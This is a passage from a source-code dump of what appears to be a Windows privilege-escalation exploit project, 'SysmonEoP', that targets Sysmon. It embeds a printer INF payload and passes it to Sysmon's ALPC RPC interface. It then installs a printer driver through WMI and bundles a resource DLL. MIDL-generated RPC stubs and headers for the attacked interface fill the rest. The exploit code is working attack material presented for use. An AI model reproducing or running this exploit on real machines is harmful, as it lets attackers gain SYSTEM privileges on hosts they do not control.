TA\\\"\\n\\n[DestinationDirs]\\nDefaultDestDir=66000\\n
Test.CopyFiles=11\\n\\n[SourceDisksFiles]\\nMSGENBW.PPD  = 1\\nTTY.DLL      = 1\\nTTYUI.HLP    = 1\\nGENIBM9W.GPD = 1\\nTTY.INI      = 1\\nMSGENCOL.PPD = 1\\nGENIBM9.GPD  = 1\\nOK9IBRES.DLL = 1\\nTTYUI.DLL    = 1\\nTTYRES.DLL   = 1\\nTTY.GPD      = 1\\n\\n[PrinterPackageInstallation.amd64]\\nPackageAware=TRUE\\nCoreDriverDependencies={D20EA372-DD35-4950-9ED8-A6335AFE79F0},{D20EA372-DD35-4950-9ED8-A6335AFE79F1}\\nInboxVersionRequired=UseDriverVer\\n\\n[Strings]\\n;Non-Localizable\\n\\n;Localizable\\nDisk1=\\\"Windows Installation Disc\\\"\\n\\n[SourceDisksNames.x86]\\n1   = %Disk1%,,,\\\"I386\\\"\\n\\n[SourceDisksNames.amd64]\\n1   = %Disk1%,,,\\\"Amd64\\\"\\n\\n[SourceDisksNames.ia64]\\n1   = %Disk1%,,,\\\"Ia64\\\"\\n\\n[SourceDisksNames.arm]\\n1   = %Disk1%,,,\\\"arm\\\"\\n\\n[SourceDisksNames.arm64]\\n1   = %Disk1%,,,\\\"arm64\\\"\\n\";\r\n    status = RpcStringBindingCompose(NULL, (RPC_WSTR)L\"ncalrpc\", NULL, (RPC_WSTR)alpc, NULL, &StringBinding);\r\n\r\n    status = RpcBindingFromStringBinding(StringBinding, &Binding);\r\n    status = RpcStringFree(&StringBinding);\r\n    RpcTryExcept\r\n    {\r\n        \r\n        Proc1(Binding, 3036,data);\r\n    }\r\n    RpcExcept(EXCEPTION_EXECUTE_HANDLER)\r\n    {\r\n        printf(\"Error: %d\\n\",RpcExceptionCode());\r\n    }\r\n    RpcEndExcept\r\n\r\n        status = RpcBindingFree(&Binding);\r\n}\r\n\r\n\r\nLPWSTR  BuildPath(LPCWSTR path) {\r\n    // static: the buffer must outlive this call, since the pointer is returned to the caller\r\n    static wchar_t ntpath[MAX_PATH];\r\n    swprintf_s(ntpath, MAX_PATH, L\"\\\\??\\\\%s\", path);\r\n    return ntpath;\r\n}\r\nBOOL AddPrinterDriverWmi() {\r\n    HRESULT hr;\r\n    hr = CoInitializeEx(0, COINIT_MULTITHREADED);\r\n    if (FAILED(hr))\r\n    {\r\n        CoUninitialize();\r\n        return FALSE;\r\n    }\r\n    hr = CoInitializeSecurity(NULL, -1, NULL, NULL, RPC_C_AUTHN_LEVEL_DEFAULT, RPC_C_IMP_LEVEL_IMPERSONATE, NULL, EOAC_NONE, NULL);\r\n    if (FAILED(hr))\r\n    {\r\n        CoUninitialize();\r\n        return FALSE;\r\n    }\r\n    IWbemLocator* pLoc = NULL;\r\n\r\n    
hr = CoCreateInstance(CLSID_WbemLocator, 0, CLSCTX_INPROC_SERVER, IID_IWbemLocator, (LPVOID*)&pLoc);\r\n    if (FAILED(hr))\r\n    {\r\n        CoUninitialize();\r\n        return FALSE;\r\n    }\r\n    IWbemServices* pSvc = NULL;\r\n    hr = pLoc->ConnectServer(_bstr_t(L\"ROOT\\\\StandardCimv2\"), NULL, NULL, 0, NULL, 0, 0, &pSvc);\r\n    if (FAILED(hr)) {\r\n        pLoc->Release();\r\n        CoUninitialize();\r\n        return FALSE;\r\n    }\r\n    hr = CoSetProxyBlanket(pSvc, RPC_C_AUTHN_WINNT, RPC_C_AUTHZ_NONE, NULL, RPC_C_AUTHN_LEVEL_CALL, RPC_C_IMP_LEVEL_IMPERSONATE, NULL, EOAC_NONE);\r\n    if (FAILED(hr)) {\r\n        pSvc->Release();\r\n        pLoc->Release();\r\n        CoUninitialize();\r\n        return FALSE; // do not continue with released interfaces\r\n    }\r\n    BSTR MethodName = SysAllocString(L\"Add\");\r\n    BSTR ClassName = SysAllocString(L\"MSFT_PrinterDriver\");\r\n    IWbemClassObject* pClass = NULL;\r\n    hr = pSvc->GetObject(ClassName, 0, NULL, &pClass, NULL);\r\n    IWbemClassObject* pInParamsDefinition = NULL;\r\n    hr = pClass->GetMethod(MethodName, 0, &pInParamsDefinition, NULL);\r\n    IWbemClassObject* pClassInstance = NULL;\r\n    hr = pInParamsDefinition->SpawnInstance(0, &pClassInstance);\r\n    VARIANT varCommand,varCommand2;\r\n    // SysAllocString: the BSTR must outlive the VARIANT (a temporary _bstr_t is freed at the end of the statement)\r\n    varCommand.vt = VT_BSTR;\r\n    varCommand.bstrVal = SysAllocString(L\"Generic / Text Only\");\r\n    varCommand2.vt = VT_BSTR;\r\n    varCommand2.bstrVal = SysAllocString(L\"C:\\\\Windows\\\\System32\\\\DriverStore\\\\FileRepository\\\\prnge001.inf_amd64_1daeee8f3aa30fcb\\\\prnge001.inf\");\r\n    hr = pClassInstance->Put(L\"Name\", 0, &varCommand, 0);\r\n    hr = pClassInstance->Put(L\"InfPath\", 0, &varCommand2, 0);\r\n    IWbemClassObject* pOutParams = NULL;\r\n    hr = pSvc->ExecMethod(ClassName, MethodName, 0, NULL, pClassInstance, &pOutParams, NULL);\r\n\r\n    if (FAILED(hr))\r\n    {\r\n\r\n        VariantClear(&varCommand);\r\n        VariantClear(&varCommand2);\r\n        SysFreeString(ClassName);\r\n        SysFreeString(MethodName);\r\n        pClass->Release();\r\n        
pClassInstance->Release();\r\n        pInParamsDefinition->Release();\r\n        if (pOutParams) pOutParams->Release(); // ExecMethod may fail before producing an out-params object\r\n        pSvc->Release();\r\n        pLoc->Release();\r\n        CoUninitialize();\r\n        return FALSE;\r\n    }\r\n    return TRUE;\r\n}\r\nvoid __RPC_FAR* __RPC_USER midl_user_allocate(size_t cBytes)\r\n{\r\n    return((void __RPC_FAR*) malloc(cBytes));\r\n}\r\n\r\nvoid __RPC_USER midl_user_free(void __RPC_FAR* p)\r\n{\r\n    free(p);\r\n}"
  },
  {
    "path": "v2/SysmonEoP/resource.h",
    "content": "//{{NO_DEPENDENCIES}}\r\n// Microsoft Visual C++ generated include file.\r\n// Used by FolderOrFileDeleteToSystem.rc\r\n//\r\n#define IDR_DLL1                        101\r\n\r\n// Next default values for new objects\r\n// \r\n#ifdef APSTUDIO_INVOKED\r\n#ifndef APSTUDIO_READONLY_SYMBOLS\r\n#define _APS_NEXT_RESOURCE_VALUE        107\r\n#define _APS_NEXT_COMMAND_VALUE         40001\r\n#define _APS_NEXT_CONTROL_VALUE         1001\r\n#define _APS_NEXT_SYMED_VALUE           101\r\n#endif\r\n#endif\r\n"
  },
  {
    "path": "v2/SysmonEoP/resource.rc",
    "content": "// Microsoft Visual C++ generated resource script.\r\n//\r\n#include \"resource.h\"\r\n\r\n#define APSTUDIO_READONLY_SYMBOLS\r\n/////////////////////////////////////////////////////////////////////////////\r\n//\r\n// Generated from the TEXTINCLUDE 2 resource.\r\n//\r\n#include \"winres.h\"\r\n\r\n/////////////////////////////////////////////////////////////////////////////\r\n#undef APSTUDIO_READONLY_SYMBOLS\r\n/////////////////////////////////////////////////////////////////////////////\r\n// English (United Kingdom) resources\r\n\r\n#if !defined(AFX_RESOURCE_DLL) || defined(AFX_TARG_ENG)\r\nLANGUAGE LANG_ENGLISH, SUBLANG_ENGLISH_UK\r\n#pragma code_page(1252)\r\n\r\n#ifdef APSTUDIO_INVOKED\r\n/////////////////////////////////////////////////////////////////////////////\r\n//\r\n// TEXTINCLUDE\r\n//\r\n\r\n1 TEXTINCLUDE\r\nBEGIN\r\n\"resource.h\\0\"\r\nEND\r\n\r\n2 TEXTINCLUDE\r\nBEGIN\r\n\"#include \"\"winres.h\"\"\\r\\n\"\r\n\"\\0\"\r\nEND\r\n\r\n3 TEXTINCLUDE\r\nBEGIN\r\n\"\\r\\n\"\r\n\"\\0\"\r\nEND\r\n\r\n#endif    // APSTUDIO_INVOKED\r\n\r\n\r\n/////////////////////////////////////////////////////////////////////////////\r\n//\r\n// RBS\r\n//\r\n\r\nIDR_DLL1                DLL                     \"dll.dll\"\r\n\r\n\r\n#endif    // English (United Kingdom) resources\r\n/////////////////////////////////////////////////////////////////////////////\r\n\r\n\r\n\r\n#ifndef APSTUDIO_INVOKED\r\n/////////////////////////////////////////////////////////////////////////////\r\n//\r\n// Generated from the TEXTINCLUDE 3 resource.\r\n//\r\n\r\n\r\n/////////////////////////////////////////////////////////////////////////////\r\n#endif    // not APSTUDIO_INVOKED\r\n"
  },
  {
    "path": "v2/SysmonEoP/sysmon.idl",
    "content": "[\r\n\tuuid(1e72d56f-eec6-44d3-bbed-5caa50790812),\r\n\tversion(1.0),\r\n]\r\ninterface DefaultIfName\r\n{\r\n\r\n\tlong Proc0(\r\n\t);\r\n\r\n\tvoid Proc1(\r\n\t\t[in]long arg_0,\r\n\t\t[in][string]  wchar_t* arg_1);\r\n}"
  },
  {
    "path": "v2/SysmonEoP/sysmon_c.c",
    "content": "\r\n\r\n/* this ALWAYS GENERATED file contains the RPC client stubs */\r\n\r\n\r\n /* File created by MIDL compiler version 8.01.0622 */\r\n/* at Mon Jan 18 19:14:07 2038\r\n */\r\n/* Compiler settings for sysmon.idl:\r\n    Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.01.0622 \r\n    protocol : all , ms_ext, c_ext, robust\r\n    error checks: allocation ref bounds_check enum stub_data \r\n    VC __declspec() decoration level: \r\n         __declspec(uuid()), __declspec(selectany), __declspec(novtable)\r\n         DECLSPEC_UUID(), MIDL_INTERFACE()\r\n*/\r\n/* @@MIDL_FILE_HEADING(  ) */\r\n\r\n#if defined(_M_AMD64)\r\n\r\n\r\n#if _MSC_VER >= 1200\r\n#pragma warning(push)\r\n#endif\r\n\r\n#pragma warning( disable: 4211 )  /* redefine extern to static */\r\n#pragma warning( disable: 4232 )  /* dllimport identity*/\r\n#pragma warning( disable: 4024 )  /* array to pointer mapping*/\r\n\r\n#include <string.h>\r\n\r\n#include \"sysmon_h.h\"\r\n\r\n#define TYPE_FORMAT_STRING_SIZE   7                                 \r\n#define PROC_FORMAT_STRING_SIZE   79                                \r\n#define EXPR_FORMAT_STRING_SIZE   1                                 \r\n#define TRANSMIT_AS_TABLE_SIZE    0            \r\n#define WIRE_MARSHAL_TABLE_SIZE   0            \r\n\r\ntypedef struct _sysmon_MIDL_TYPE_FORMAT_STRING\r\n    {\r\n    short          Pad;\r\n    unsigned char  Format[ TYPE_FORMAT_STRING_SIZE ];\r\n    } sysmon_MIDL_TYPE_FORMAT_STRING;\r\n\r\ntypedef struct _sysmon_MIDL_PROC_FORMAT_STRING\r\n    {\r\n    short          Pad;\r\n    unsigned char  Format[ PROC_FORMAT_STRING_SIZE ];\r\n    } sysmon_MIDL_PROC_FORMAT_STRING;\r\n\r\ntypedef struct _sysmon_MIDL_EXPR_FORMAT_STRING\r\n    {\r\n    long          Pad;\r\n    unsigned char  Format[ EXPR_FORMAT_STRING_SIZE ];\r\n    } sysmon_MIDL_EXPR_FORMAT_STRING;\r\n\r\n\r\nstatic const RPC_SYNTAX_IDENTIFIER  _RpcTransferSyntax = 
\r\n{{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}};\r\n\r\nstatic const RPC_SYNTAX_IDENTIFIER  _NDR64_RpcTransferSyntax = \r\n{{0x71710533,0xbeba,0x4937,{0x83,0x19,0xb5,0xdb,0xef,0x9c,0xcc,0x36}},{1,0}};\r\n\r\n\r\n\r\nextern const sysmon_MIDL_TYPE_FORMAT_STRING sysmon__MIDL_TypeFormatString;\r\nextern const sysmon_MIDL_PROC_FORMAT_STRING sysmon__MIDL_ProcFormatString;\r\nextern const sysmon_MIDL_EXPR_FORMAT_STRING sysmon__MIDL_ExprFormatString;\r\n\r\n#define GENERIC_BINDING_TABLE_SIZE   0            \r\n\r\n\r\n/* Standard interface: DefaultIfName, ver. 1.0,\r\n   GUID={0x1e72d56f,0xeec6,0x44d3,{0xbb,0xed,0x5c,0xaa,0x50,0x79,0x08,0x12}} */\r\n\r\n extern const MIDL_STUBLESS_PROXY_INFO DefaultIfName_ProxyInfo;\r\n\r\n\r\nstatic const RPC_CLIENT_INTERFACE DefaultIfName___RpcClientInterface =\r\n    {\r\n    sizeof(RPC_CLIENT_INTERFACE),\r\n    {{0x1e72d56f,0xeec6,0x44d3,{0xbb,0xed,0x5c,0xaa,0x50,0x79,0x08,0x12}},{1,0}},\r\n    {{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}},\r\n    0,\r\n    0,\r\n    0,\r\n    0,\r\n    &DefaultIfName_ProxyInfo,\r\n    0x02000000\r\n    };\r\nRPC_IF_HANDLE DefaultIfName_v1_0_c_ifspec = (RPC_IF_HANDLE)& DefaultIfName___RpcClientInterface;\r\n\r\nextern const MIDL_STUB_DESC DefaultIfName_StubDesc;\r\n\r\nstatic RPC_BINDING_HANDLE DefaultIfName__MIDL_AutoBindHandle;\r\n\r\n\r\nlong Proc0( \r\n    /* [in] */ handle_t IDL_handle)\r\n{\r\n\r\n    CLIENT_CALL_RETURN _RetVal;\r\n\r\n    _RetVal = NdrClientCall3(\r\n                  ( PMIDL_STUBLESS_PROXY_INFO  )&DefaultIfName_ProxyInfo,\r\n                  0,\r\n                  0,\r\n                  IDL_handle);\r\n    return ( long  )_RetVal.Simple;\r\n    \r\n}\r\n\r\n\r\nvoid Proc1( \r\n    /* [in] */ handle_t IDL_handle,\r\n    /* [in] */ long arg_0,\r\n    /* [string][in] */ wchar_t *arg_1)\r\n{\r\n\r\n    NdrClientCall3(\r\n                  ( PMIDL_STUBLESS_PROXY_INFO  )&DefaultIfName_ProxyInfo,\r\n                  
1,\r\n                  0,\r\n                  IDL_handle,\r\n                  arg_0,\r\n                  arg_1);\r\n    \r\n}\r\n\r\n\r\n#if !defined(__RPC_WIN64__)\r\n#error  Invalid build platform for this stub.\r\n#endif\r\n\r\nstatic const sysmon_MIDL_PROC_FORMAT_STRING sysmon__MIDL_ProcFormatString =\r\n    {\r\n        0,\r\n        {\r\n\r\n\t/* Procedure Proc0 */\r\n\r\n\t\t\t0x0,\t\t/* 0 */\r\n\t\t\t0x48,\t\t/* Old Flags:  */\r\n/*  2 */\tNdrFcLong( 0x0 ),\t/* 0 */\r\n/*  6 */\tNdrFcShort( 0x0 ),\t/* 0 */\r\n/*  8 */\tNdrFcShort( 0x10 ),\t/* X64 Stack size/offset = 16 */\r\n/* 10 */\t0x32,\t\t/* FC_BIND_PRIMITIVE */\r\n\t\t\t0x0,\t\t/* 0 */\r\n/* 12 */\tNdrFcShort( 0x0 ),\t/* X64 Stack size/offset = 0 */\r\n/* 14 */\tNdrFcShort( 0x0 ),\t/* 0 */\r\n/* 16 */\tNdrFcShort( 0x8 ),\t/* 8 */\r\n/* 18 */\t0x44,\t\t/* Oi2 Flags:  has return, has ext, */\r\n\t\t\t0x1,\t\t/* 1 */\r\n/* 20 */\t0xa,\t\t/* 10 */\r\n\t\t\t0x1,\t\t/* Ext Flags:  new corr desc, */\r\n/* 22 */\tNdrFcShort( 0x0 ),\t/* 0 */\r\n/* 24 */\tNdrFcShort( 0x0 ),\t/* 0 */\r\n/* 26 */\tNdrFcShort( 0x0 ),\t/* 0 */\r\n/* 28 */\tNdrFcShort( 0x0 ),\t/* 0 */\r\n\r\n\t/* Return value */\r\n\r\n/* 30 */\tNdrFcShort( 0x70 ),\t/* Flags:  out, return, base type, */\r\n/* 32 */\tNdrFcShort( 0x8 ),\t/* X64 Stack size/offset = 8 */\r\n/* 34 */\t0x8,\t\t/* FC_LONG */\r\n\t\t\t0x0,\t\t/* 0 */\r\n\r\n\t/* Procedure Proc1 */\r\n\r\n/* 36 */\t0x0,\t\t/* 0 */\r\n\t\t\t0x48,\t\t/* Old Flags:  */\r\n/* 38 */\tNdrFcLong( 0x0 ),\t/* 0 */\r\n/* 42 */\tNdrFcShort( 0x1 ),\t/* 1 */\r\n/* 44 */\tNdrFcShort( 0x18 ),\t/* X64 Stack size/offset = 24 */\r\n/* 46 */\t0x32,\t\t/* FC_BIND_PRIMITIVE */\r\n\t\t\t0x0,\t\t/* 0 */\r\n/* 48 */\tNdrFcShort( 0x0 ),\t/* X64 Stack size/offset = 0 */\r\n/* 50 */\tNdrFcShort( 0x8 ),\t/* 8 */\r\n/* 52 */\tNdrFcShort( 0x0 ),\t/* 0 */\r\n/* 54 */\t0x42,\t\t/* Oi2 Flags:  clt must size, has ext, */\r\n\t\t\t0x2,\t\t/* 2 */\r\n/* 56 */\t0xa,\t\t/* 10 */\r\n\t\t\t0x1,\t\t/* Ext Flags:  new corr desc, 
*/\r\n/* 58 */\tNdrFcShort( 0x0 ),\t/* 0 */\r\n/* 60 */\tNdrFcShort( 0x0 ),\t/* 0 */\r\n/* 62 */\tNdrFcShort( 0x0 ),\t/* 0 */\r\n/* 64 */\tNdrFcShort( 0x0 ),\t/* 0 */\r\n\r\n\t/* Parameter arg_0 */\r\n\r\n/* 66 */\tNdrFcShort( 0x48 ),\t/* Flags:  in, base type, */\r\n/* 68 */\tNdrFcShort( 0x8 ),\t/* X64 Stack size/offset = 8 */\r\n/* 70 */\t0x8,\t\t/* FC_LONG */\r\n\t\t\t0x0,\t\t/* 0 */\r\n\r\n\t/* Parameter arg_1 */\r\n\r\n/* 72 */\tNdrFcShort( 0x10b ),\t/* Flags:  must size, must free, in, simple ref, */\r\n/* 74 */\tNdrFcShort( 0x10 ),\t/* X64 Stack size/offset = 16 */\r\n/* 76 */\tNdrFcShort( 0x4 ),\t/* Type Offset=4 */\r\n\r\n\t\t\t0x0\r\n        }\r\n    };\r\n\r\nstatic const sysmon_MIDL_TYPE_FORMAT_STRING sysmon__MIDL_TypeFormatString =\r\n    {\r\n        0,\r\n        {\r\n\t\t\tNdrFcShort( 0x0 ),\t/* 0 */\r\n/*  2 */\t\r\n\t\t\t0x11, 0x8,\t/* FC_RP [simple_pointer] */\r\n/*  4 */\t\r\n\t\t\t0x25,\t\t/* FC_C_WSTRING */\r\n\t\t\t0x5c,\t\t/* FC_PAD */\r\n\r\n\t\t\t0x0\r\n        }\r\n    };\r\n\r\nstatic const unsigned short DefaultIfName_FormatStringOffsetTable[] =\r\n    {\r\n    0,\r\n    36\r\n    };\r\n\r\n\r\n\r\n#endif /* defined(_M_AMD64)*/\r\n\r\n\r\n\r\n/* this ALWAYS GENERATED file contains the RPC client stubs */\r\n\r\n\r\n /* File created by MIDL compiler version 8.01.0622 */\r\n/* at Mon Jan 18 19:14:07 2038\r\n */\r\n/* Compiler settings for sysmon.idl:\r\n    Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.01.0622 \r\n    protocol : all , ms_ext, c_ext, robust\r\n    error checks: allocation ref bounds_check enum stub_data \r\n    VC __declspec() decoration level: \r\n         __declspec(uuid()), __declspec(selectany), __declspec(novtable)\r\n         DECLSPEC_UUID(), MIDL_INTERFACE()\r\n*/\r\n/* @@MIDL_FILE_HEADING(  ) */\r\n\r\n#if defined(_M_AMD64)\r\n\r\n\r\n\r\n\r\n#if !defined(__RPC_WIN64__)\r\n#error  Invalid build platform for this stub.\r\n#endif\r\n\r\n\r\n#include \"ndr64types.h\"\r\n#include 
\"pshpack8.h\"\r\n\r\n\r\ntypedef \r\nstruct _NDR64_CONFORMANT_STRING_FORMAT\r\n__midl_frag7_t;\r\nextern const __midl_frag7_t __midl_frag7;\r\n\r\ntypedef \r\nstruct _NDR64_POINTER_FORMAT\r\n__midl_frag6_t;\r\nextern const __midl_frag6_t __midl_frag6;\r\n\r\ntypedef \r\nNDR64_FORMAT_CHAR\r\n__midl_frag5_t;\r\nextern const __midl_frag5_t __midl_frag5;\r\n\r\ntypedef \r\nstruct \r\n{\r\n    struct _NDR64_PROC_FORMAT frag1;\r\n    struct _NDR64_BIND_AND_NOTIFY_EXTENSION frag2;\r\n    struct _NDR64_PARAM_FORMAT frag3;\r\n    struct _NDR64_PARAM_FORMAT frag4;\r\n}\r\n__midl_frag4_t;\r\nextern const __midl_frag4_t __midl_frag4;\r\n\r\ntypedef \r\nstruct \r\n{\r\n    struct _NDR64_PROC_FORMAT frag1;\r\n    struct _NDR64_BIND_AND_NOTIFY_EXTENSION frag2;\r\n    struct _NDR64_PARAM_FORMAT frag3;\r\n}\r\n__midl_frag2_t;\r\nextern const __midl_frag2_t __midl_frag2;\r\n\r\ntypedef \r\nNDR64_FORMAT_UINT32\r\n__midl_frag1_t;\r\nextern const __midl_frag1_t __midl_frag1;\r\n\r\nstatic const __midl_frag7_t __midl_frag7 =\r\n{ \r\n/* *wchar_t */\r\n    { \r\n    /* *wchar_t */\r\n        0x64,    /* FC64_CONF_WCHAR_STRING */\r\n        { \r\n        /* *wchar_t */\r\n            0,\r\n            0,\r\n            0,\r\n            0,\r\n            0,\r\n            0,\r\n            0,\r\n            0\r\n        },\r\n        (NDR64_UINT16) 2 /* 0x2 */\r\n    }\r\n};\r\n\r\nstatic const __midl_frag6_t __midl_frag6 =\r\n{ \r\n/* *wchar_t */\r\n    0x20,    /* FC64_RP */\r\n    (NDR64_UINT8) 0 /* 0x0 */,\r\n    (NDR64_UINT16) 0 /* 0x0 */,\r\n    &__midl_frag7\r\n};\r\n\r\nstatic const __midl_frag5_t __midl_frag5 =\r\n0x5    /* FC64_INT32 */;\r\n\r\nstatic const __midl_frag4_t __midl_frag4 =\r\n{ \r\n/* Proc1 */\r\n    { \r\n    /* Proc1 */      /* procedure Proc1 */\r\n        (NDR64_UINT32) 17039424 /* 0x1040040 */,    /* explicit handle */ /* IsIntrepreted, ClientMustSize, HasExtensions */\r\n        (NDR64_UINT32) 24 /* 0x18 */ ,  /* Stack size */\r\n        (NDR64_UINT32) 8 /* 
0x8 */,\r\n        (NDR64_UINT32) 0 /* 0x0 */,\r\n        (NDR64_UINT16) 0 /* 0x0 */,\r\n        (NDR64_UINT16) 0 /* 0x0 */,\r\n        (NDR64_UINT16) 2 /* 0x2 */,\r\n        (NDR64_UINT16) 8 /* 0x8 */\r\n    },\r\n    { \r\n    /* struct _NDR64_BIND_AND_NOTIFY_EXTENSION */\r\n        { \r\n        /* struct _NDR64_BIND_AND_NOTIFY_EXTENSION */\r\n            0x72,    /* FC64_BIND_PRIMITIVE */\r\n            (NDR64_UINT8) 0 /* 0x0 */,\r\n            0 /* 0x0 */,   /* Stack offset */\r\n            (NDR64_UINT8) 0 /* 0x0 */,\r\n            (NDR64_UINT8) 0 /* 0x0 */\r\n        },\r\n        (NDR64_UINT16) 0 /* 0x0 */      /* Notify index */\r\n    },\r\n    { \r\n    /* arg_0 */      /* parameter arg_0 */\r\n        &__midl_frag5,\r\n        { \r\n        /* arg_0 */\r\n            0,\r\n            0,\r\n            0,\r\n            1,\r\n            0,\r\n            0,\r\n            1,\r\n            1,\r\n            0,\r\n            0,\r\n            0,\r\n            0,\r\n            0,\r\n            (NDR64_UINT16) 0 /* 0x0 */,\r\n            0\r\n        },    /* [in], Basetype, ByValue */\r\n        (NDR64_UINT16) 0 /* 0x0 */,\r\n        8 /* 0x8 */,   /* Stack offset */\r\n    },\r\n    { \r\n    /* arg_1 */      /* parameter arg_1 */\r\n        &__midl_frag7,\r\n        { \r\n        /* arg_1 */\r\n            1,\r\n            1,\r\n            0,\r\n            1,\r\n            0,\r\n            0,\r\n            0,\r\n            0,\r\n            1,\r\n            0,\r\n            0,\r\n            0,\r\n            0,\r\n            (NDR64_UINT16) 0 /* 0x0 */,\r\n            0\r\n        },    /* MustSize, MustFree, [in], SimpleRef */\r\n        (NDR64_UINT16) 0 /* 0x0 */,\r\n        16 /* 0x10 */,   /* Stack offset */\r\n    }\r\n};\r\n\r\nstatic const __midl_frag2_t __midl_frag2 =\r\n{ \r\n/* Proc0 */\r\n    { \r\n    /* Proc0 */      /* procedure Proc0 */\r\n        (NDR64_UINT32) 17301568 /* 0x1080040 */,    /* explicit handle */ /* 
IsIntrepreted, HasReturn, HasExtensions */\r\n        (NDR64_UINT32) 16 /* 0x10 */ ,  /* Stack size */\r\n        (NDR64_UINT32) 0 /* 0x0 */,\r\n        (NDR64_UINT32) 8 /* 0x8 */,\r\n        (NDR64_UINT16) 0 /* 0x0 */,\r\n        (NDR64_UINT16) 0 /* 0x0 */,\r\n        (NDR64_UINT16) 1 /* 0x1 */,\r\n        (NDR64_UINT16) 8 /* 0x8 */\r\n    },\r\n    { \r\n    /* struct _NDR64_BIND_AND_NOTIFY_EXTENSION */\r\n        { \r\n        /* struct _NDR64_BIND_AND_NOTIFY_EXTENSION */\r\n            0x72,    /* FC64_BIND_PRIMITIVE */\r\n            (NDR64_UINT8) 0 /* 0x0 */,\r\n            0 /* 0x0 */,   /* Stack offset */\r\n            (NDR64_UINT8) 0 /* 0x0 */,\r\n            (NDR64_UINT8) 0 /* 0x0 */\r\n        },\r\n        (NDR64_UINT16) 0 /* 0x0 */      /* Notify index */\r\n    },\r\n    { \r\n    /* long */      /* parameter long */\r\n        &__midl_frag5,\r\n        { \r\n        /* long */\r\n            0,\r\n            0,\r\n            0,\r\n            0,\r\n            1,\r\n            1,\r\n            1,\r\n            1,\r\n            0,\r\n            0,\r\n            0,\r\n            0,\r\n            0,\r\n            (NDR64_UINT16) 0 /* 0x0 */,\r\n            0\r\n        },    /* [out], IsReturn, Basetype, ByValue */\r\n        (NDR64_UINT16) 0 /* 0x0 */,\r\n        8 /* 0x8 */,   /* Stack offset */\r\n    }\r\n};\r\n\r\nstatic const __midl_frag1_t __midl_frag1 =\r\n(NDR64_UINT32) 0 /* 0x0 */;\r\n\r\n\r\n#include \"poppack.h\"\r\n\r\n\r\nstatic const FormatInfoRef DefaultIfName_Ndr64ProcTable[] =\r\n    {\r\n    &__midl_frag2,\r\n    &__midl_frag4\r\n    };\r\n\r\n\r\nstatic const MIDL_STUB_DESC DefaultIfName_StubDesc = \r\n    {\r\n    (void *)& DefaultIfName___RpcClientInterface,\r\n    MIDL_user_allocate,\r\n    MIDL_user_free,\r\n    &DefaultIfName__MIDL_AutoBindHandle,\r\n    0,\r\n    0,\r\n    0,\r\n    0,\r\n    sysmon__MIDL_TypeFormatString.Format,\r\n    1, /* -error bounds_check flag */\r\n    0x60001, /* Ndr library version */\r\n   
 0,\r\n    0x801026e, /* MIDL Version 8.1.622 */\r\n    0,\r\n    0,\r\n    0,  /* notify & notify_flag routine table */\r\n    0x2000001, /* MIDL flag */\r\n    0, /* cs routines */\r\n    (void *)& DefaultIfName_ProxyInfo,   /* proxy/server info */\r\n    0\r\n    };\r\n\r\nstatic const MIDL_SYNTAX_INFO DefaultIfName_SyntaxInfo [  2 ] = \r\n    {\r\n    {\r\n    {{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}},\r\n    0,\r\n    sysmon__MIDL_ProcFormatString.Format,\r\n    DefaultIfName_FormatStringOffsetTable,\r\n    sysmon__MIDL_TypeFormatString.Format,\r\n    0,\r\n    0,\r\n    0\r\n    }\r\n    ,{\r\n    {{0x71710533,0xbeba,0x4937,{0x83,0x19,0xb5,0xdb,0xef,0x9c,0xcc,0x36}},{1,0}},\r\n    0,\r\n    0 ,\r\n    (unsigned short *) DefaultIfName_Ndr64ProcTable,\r\n    0,\r\n    0,\r\n    0,\r\n    0\r\n    }\r\n    };\r\n\r\nstatic const MIDL_STUBLESS_PROXY_INFO DefaultIfName_ProxyInfo =\r\n    {\r\n    &DefaultIfName_StubDesc,\r\n    sysmon__MIDL_ProcFormatString.Format,\r\n    DefaultIfName_FormatStringOffsetTable,\r\n    (RPC_SYNTAX_IDENTIFIER*)&_RpcTransferSyntax,\r\n    2,\r\n    (MIDL_SYNTAX_INFO*)DefaultIfName_SyntaxInfo\r\n    \r\n    };\r\n\r\n#if _MSC_VER >= 1200\r\n#pragma warning(pop)\r\n#endif\r\n\r\n\r\n#endif /* defined(_M_AMD64)*/\r\n\r\n"
  },
  {
    "path": "v2/SysmonEoP/sysmon_h.h",
    "content": "\r\n\r\n/* this ALWAYS GENERATED file contains the definitions for the interfaces */\r\n\r\n\r\n /* File created by MIDL compiler version 8.01.0622 */\r\n/* at Mon Jan 18 19:14:07 2038\r\n */\r\n/* Compiler settings for sysmon.idl:\r\n    Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.01.0622 \r\n    protocol : all , ms_ext, c_ext, robust\r\n    error checks: allocation ref bounds_check enum stub_data \r\n    VC __declspec() decoration level: \r\n         __declspec(uuid()), __declspec(selectany), __declspec(novtable)\r\n         DECLSPEC_UUID(), MIDL_INTERFACE()\r\n*/\r\n/* @@MIDL_FILE_HEADING(  ) */\r\n\r\n\r\n\r\n/* verify that the <rpcndr.h> version is high enough to compile this file*/\r\n#ifndef __REQUIRED_RPCNDR_H_VERSION__\r\n#define __REQUIRED_RPCNDR_H_VERSION__ 500\r\n#endif\r\n\r\n#include \"rpc.h\"\r\n#include \"rpcndr.h\"\r\n\r\n#ifndef __RPCNDR_H_VERSION__\r\n#error this stub requires an updated version of <rpcndr.h>\r\n#endif /* __RPCNDR_H_VERSION__ */\r\n\r\n\r\n#ifndef __sysmon_h_h__\r\n#define __sysmon_h_h__\r\n\r\n#if defined(_MSC_VER) && (_MSC_VER >= 1020)\r\n#pragma once\r\n#endif\r\n\r\n/* Forward Declarations */ \r\n\r\n#ifdef __cplusplus\r\nextern \"C\"{\r\n#endif \r\n\r\n\r\n#ifndef __DefaultIfName_INTERFACE_DEFINED__\r\n#define __DefaultIfName_INTERFACE_DEFINED__\r\n\r\n/* interface DefaultIfName */\r\n/* [version][uuid] */ \r\n\r\nlong Proc0( \r\n    /* [in] */ handle_t IDL_handle);\r\n\r\nvoid Proc1( \r\n    /* [in] */ handle_t IDL_handle,\r\n    /* [in] */ long 